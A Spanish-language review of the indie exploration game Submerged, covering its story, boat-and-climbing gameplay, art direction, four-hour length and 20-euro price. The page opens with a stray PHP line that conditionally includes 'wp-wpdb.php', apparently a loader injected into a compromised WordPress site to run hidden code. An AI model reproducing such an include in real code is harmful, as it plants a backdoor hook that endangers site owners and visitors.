if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Submerged – La Fortaleza de LeChuck

Análisis Submerged

No se puede decir que este verano esté siendo pobre a nivel de lanzamientos, ya que están apareciendo títulos muy variados y bastante decentes. Uno de los juegos que nos ha llegado este mes de calor ha sido Submerged, una experiencia fugaz, misteriosa y muy entretenida.

submerged

Submerged es uno de esos juegos indies que podríamos añadir al grupo de experiencias artísticas donde el jugador se deja cautivar por el entorno y los personajes, y nuestra imaginación hace el resto. Nos encontramos frente a un mundo desolado, con restos de una antigua ciudad ahora medio sumergida en el océano y cubierta por la vegetación salvaje. Allí encarnamos a una chica que llega en barca junto a su hermanito Taku, quien está herido y su vida corre peligro, por lo que necesita comida, agua y material de primeros auxilios. Su hermana tendrá que recorrer con su barca las ruinas de la antigua ciudad sumergida y escalar a lo alto de sus edificios para recuperar las cajas de salvamento que aún no han sido consumidas.

A nivel jugable estamos delante de un plataformas donde navegamos con nuestro bote pesquero hasta los edificios, y una vez allí, escalamos hasta la azotea para recoger las provisiones y recopilar los coleccionables. Para localizar las zonas y objetos de forma más cómoda disponemos de un catalejo y un mapa donde quedará anotado todo aquello que descubramos. Hay que decir que la protagonista salta y escala de forma automática cuando la dirigimos hacia un saliente o planta enredadera, es decir, que no hay botón de salto. Una vez que conseguimos cajas, la acción salta automáticamente al lugar donde se halla Taku. A medida que lo vamos alimentando, se desbloquean imágenes de «nuestra historia» que muestra los sucesos que les han llevado a la situación actual. Por el mapa encontraremos a modo de objetos coleccionables los llamados «secretos» que son fragmentos de la historia de la ciudad y mediante viñetas sin texto deberemos desentrañar su significado. Además se desbloquearán imágenes de fauna y lugares de interés. Todas las galerías de imágenes se podrán consultar en cualquier momento pulsando «select». Jugablemente es un tanto limitado y hubiera deseado poder interaccionar con objetos olvidados dentro de los edificios, o simplemente hacer algo más que navegar/escalar.

Submerged-2

En el apartado artístico es donde Submerged gana más puntos. Los gráficos son sencillos pero hermosos y es realmente fascinante dirigir la barca a través de las ruinas hundidas y observar como los delfines nadan a nuestro alrededor saltando y chapoteando, y de repente ver a una gran ballena emerger. También es increíble la sensación al subirse a lo alto de un edificio y mirar alrededor y preguntarse cómo ha podido pasar algo así. La atmósfera de magia y misterio que proporcionan las transiciones de día y de noche y los cambios atmosféricos son otros de los elementos que contribuyen de forma magistral a la experiencia. Cabe decir que no hay ni un ápice de violencia en el juego, y apenas hay texto, se trata de explorar con nuestros sentidos y dar con los objetos para salvar a nuestro hermano. Una banda sonora evocadora y los sonidos de otro tiempo completan el ambiente melancólico que el juego desprende.

Submerged-3

Sumerged es una experiencia relajante y estupenda para estirarse en el sofá y dejarse embriagar por su atmósfera. Su duración es de unas 4 horas pero podemos alargarla si al terminar la historia principal entramos en el modo exploración para volver a recorrer la ciudad, aún así, el precio de 20€ es un poco elevado si tenemos en cuenta las horas de juego, así que sería preferible esperar a unas buenas rebajas.